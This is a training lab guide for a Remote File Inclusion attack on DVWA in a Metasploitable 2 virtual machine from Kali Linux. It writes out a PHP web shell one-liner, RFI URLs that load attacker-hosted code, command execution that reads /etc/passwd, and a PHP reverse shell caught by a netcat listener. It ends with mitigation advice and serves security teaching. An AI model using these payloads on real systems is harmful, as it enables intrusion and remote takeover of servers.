Lab Instructions: Remote File Inclusion (RFI) Attack using Metasploitable

and Kali Linux

In this lab, we will perform a Remote File Inclusion (RFI) attack on a vulnerable web
application running on Metasploitable 2 using Kali Linux. RFI allows attackers to include
remote files, often leading to remote code execution (RCE). This lab simulates the process of
identifying and exploiting an RFI vulnerability to upload a malicious PHP shell and gain
access to the Metasploitable machine.

Prerequisites

1. Kali Linux machine (Attacker)

2. Metasploitable 2 machine (Target)
3. Basic understanding of web exploitation techniques.

Step-by-Step Lab Guide

Step 1: Setup the Lab Environment

1. Start Kali Linux and Metasploitable 2:

o Ensure that both Kali and Metasploitable 2 are running on the same network.
You can use Bridged Networking or NAT mode in VirtualBox or VMware.
2. Get the IP Address of Metasploitable 2:
o Log in to Metasploitable 2 (username: msfadmin, password: msfadmin).
o Run the following command to obtain its IP address:

Copy code
ifconfig

o Take note of the IP address (e.g., 192.168.1.105).

3. Verify Network Connectivity:
o From your Kali Linux machine, verify that you can communicate with the
Metasploitable 2 machine by pinging it:

php
Copy code
ping <Metasploitable_IP>

Example:

Copy code
ping 192.168.1.105

Step 2: Identify the Vulnerable Web Application

1. Visit the Vulnerable Web App:

o Open a browser in Kali Linux and navigate to Metasploitable’s web
application:
 arduino
Copy code
http://<Metasploitable_IP>

Example:

arduino
Copy code
http://192.168.1.105

2. Navigate to DVWA (Damn Vulnerable Web Application):

o On the Metasploitable 2 main page, find and click on DVWA (Damn
Vulnerable Web Application).
3. Log into DVWA:
o Use the default credentials:

makefile
Copy code
Username: admin
Password: password

4. Set the DVWA Security Level:

o In DVWA, go to the DVWA Security tab on the left-hand side.
o Set the Security Level to low to simplify the exploitation.

Step 3: Exploit Remote File Inclusion (RFI) Vulnerability

1. Go to the Vulnerable RFI Page:

o In DVWA, click on the File Inclusion section under Vulnerabilities in the
left sidebar.
o This page allows you to include local files via the page parameter in the URL.
2. Test for RFI:
o In the URL, you will see something like:

ruby
Copy code
http://192.168.1.105/dvwa/vulnerabilities/fi/?page=include.php

o Modify the page parameter to include a remote file:

ruby
Copy code
http://192.168.1.105/dvwa/vulnerabilities/fi/?page=http://
<Kali_IP>/shell.txt

o Replace <Kali_IP> with your Kali machine’s IP address. For now, this will
result in an error as we have not set up the malicious file yet.

Step 4: Set Up a Malicious PHP Shell on Kali Linux

 1. Create a Malicious PHP Shell:
o On your Kali Linux machine, create a simple PHP shell. Open a terminal and
create a file called shell.php in the web server’s directory
(/var/www/html/):

bash
Copy code
echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/shell.php

o This PHP file will allow you to execute system commands on the
Metasploitable server by passing the cmd parameter.
2. Start the Apache Web Server on Kali:
o Kali Linux comes with the Apache web server pre-installed. Start the web
server to host your malicious shell:

bash
Copy code
service apache2 start

o Verify that your web server is running by navigating to:

arduino
Copy code
http://<Kali_IP>/shell.php

o You should see a blank page. This indicates that the PHP shell is hosted
successfully.

Step 5: Exploit RFI to Gain Remote Code Execution

1. Trigger the RFI Attack:

o Now go back to the browser window with DVWA, and in the URL, replace
the page parameter to point to your Kali server hosting the shell.php:

ruby
Copy code
http://192.168.1.105/dvwa/vulnerabilities/fi/?page=http://
<Kali_IP>/shell.php&cmd=id

o This will execute the id command on the Metasploitable server and return
information about the user running the web application.
2. Execute Other Commands:
o You can replace the cmd=id part of the URL with other system commands
like:

ruby
Copy code
http://192.168.1.105/dvwa/vulnerabilities/fi/?page=http://
<Kali_IP>/shell.php&cmd=uname -a

This command will provide information about the server's operating system.
 o Example commands to run:
 cat /etc/passwd – To read the password file.
 whoami – To check which user the web server is running as.

Step 6: Upload a More Advanced PHP Shell

1. Upload a Reverse Shell:

o To get a more interactive shell, you can upload a PHP reverse shell. Download
the PHP reverse shell from Pentestmonkey:

bash
Copy code
wget https://raw.githubusercontent.com/pentestmonkey/php-
reverse-shell/master/php-reverse-shell.php

o Modify the reverse shell to point to your Kali Linux IP and a listening port:

php
Copy code
$ip = '<Kali_IP>';
$port = 1234;

2. Start a Netcat Listener on Kali:

o In Kali Linux, open a terminal and start listening for a reverse shell
connection:

bash
Copy code
nc -lvnp 1234

3. Trigger the Reverse Shell:

o Modify the DVWA URL to include the reverse shell:

ruby
Copy code
http://192.168.1.105/dvwa/vulnerabilities/fi/?page=http://
<Kali_IP>/php-reverse-shell.php

o Once the shell is triggered, you should see a connection from Metasploitable
to your Kali machine in the Netcat listener.

Step 7: Clean Up

1. Stop the Web Server on Kali Linux:

bash
Copy code
service apache2 stop
 2. Terminate the Metasploitable Machine after completing the lab to avoid keeping
vulnerable services exposed.

Conclusion

In this lab, you successfully performed a Remote File Inclusion (RFI) attack, uploaded a
malicious PHP shell, and executed system commands on a vulnerable Metasploitable 2
machine using Kali Linux. This is a common web application vulnerability that demonstrates
the importance of input validation and secure coding practices to avoid the inclusion of
arbitrary files.

Mitigation

To protect against RFI:

1. Disable URL includes in configuration (allow_url_include = Off in PHP).

2. Sanitize and validate all user inputs.
3. Use whitelisting to restrict which files can be included.
4. Keep web servers and applications updated with the latest security patches.